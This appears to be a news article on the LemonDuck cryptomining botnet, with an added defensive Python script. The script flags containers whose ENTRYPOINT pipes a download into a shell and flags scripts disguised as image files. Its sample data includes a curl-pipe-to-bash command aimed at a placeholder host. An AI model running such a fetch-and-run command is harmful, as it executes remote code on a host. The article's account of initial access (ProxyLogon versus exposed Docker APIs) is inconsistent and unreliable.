A new botnet made up of compromised Microsoft Exchange servers is mining cryptocurrency for its operators, reports suggest.
According to researchers from security firm CrowdStrike, an unknown malicious actor is using the LemonDuck cryptomining botnet to target servers via ProxyLogon.
The attackers search for exposed Docker APIs to gain initial access, then run a malicious container with a custom Docker ENTRYPOINT that downloads a “core.png” image file, which is in fact a disguised Bash script.
After gaining initial access, attackers can perform a number of actions: abusing EternalBlue, BlueKeep, or similar exploits to elevate privileges, installing cryptominers, and moving laterally through compromised networks.
They can also install files that allow them to evade detection from any antivirus or malware scanning software installed on compromised endpoints.
Of the available cryptominers, the attackers primarily use XMRig to mine Monero, a privacy-focused cryptocurrency that is harder to trace.
The researchers further explained that LemonDuck comes with a file called “a.asp”, which is able to disable Alibaba's Aliyun cloud service on the host and thus evade detection.
On why the campaign went undetected for so long, the researchers noted that the threat actors were not scanning public IP address ranges en masse for exploitable attack surfaces; instead, they moved laterally through hosts already running LemonDuck, looking for SSH keys on the filesystem. Once they find SSH keys, they use them to connect to further servers and run all the aforementioned malicious scripts.
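Two defensive checks a host owner can run against the tradecraft described above (a container ENTRYPOINT that pipes a download straight into a shell, and a script stored under an image file name such as “core.png”). This is an added example, not code from the article or from CrowdStrike; the `docker inspect` sample and the file contents are constructed, and the IP address is a documentation address.

```python
import json
import re

# Constructed `docker inspect` output (not from the page), trimmed to the
# Config fields these checks need. 198.51.100.7 is a documentation address.
SAMPLE_INSPECT = json.dumps([
    {"Id": "abc123", "Config": {"Image": "alpine",
     "Entrypoint": ["sh", "-c", "curl -s http://198.51.100.7/core.png | bash"]}},
    {"Id": "def456", "Config": {"Image": "nginx",
     "Entrypoint": ["/docker-entrypoint.sh"]}},
])

# Magic bytes a genuine image file of each type starts with.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# curl/wget output piped into sh or bash, the "fetch and run" pattern.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def suspicious_entrypoints(inspect_json: str) -> list:
    """Return the IDs of containers whose ENTRYPOINT pipes a download into a shell."""
    hits = []
    for container in json.loads(inspect_json):
        entry = container.get("Config", {}).get("Entrypoint") or []
        if FETCH_AND_RUN.search(" ".join(entry)):
            hits.append(container["Id"])
    return hits


def is_masqueraded_image(name: str, data: bytes) -> bool:
    """True when a file named like an image does not start with that type's
    magic bytes, e.g. a Bash script saved as core.png. Non-image names are
    not judged here and return False."""
    ext = name[name.rfind("."):].lower() if "." in name else ""
    magic = IMAGE_MAGIC.get(ext)
    if magic is None:
        return False
    return not data.startswith(magic)


if __name__ == "__main__":
    print("fetch-and-run containers:", suspicious_entrypoints(SAMPLE_INSPECT))
    print("core.png masqueraded:", is_masqueraded_image("core.png", b"#!/bin/bash\n"))
```

On a live host, feed `docker inspect $(docker ps -q)` to the first function and the bytes of any downloaded "image" to the second.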
Cryptominers have become extremely popular in recent years, as the rising price of cryptocurrencies and the ease with which they can be sold have attracted the attention of both honest and dishonest players.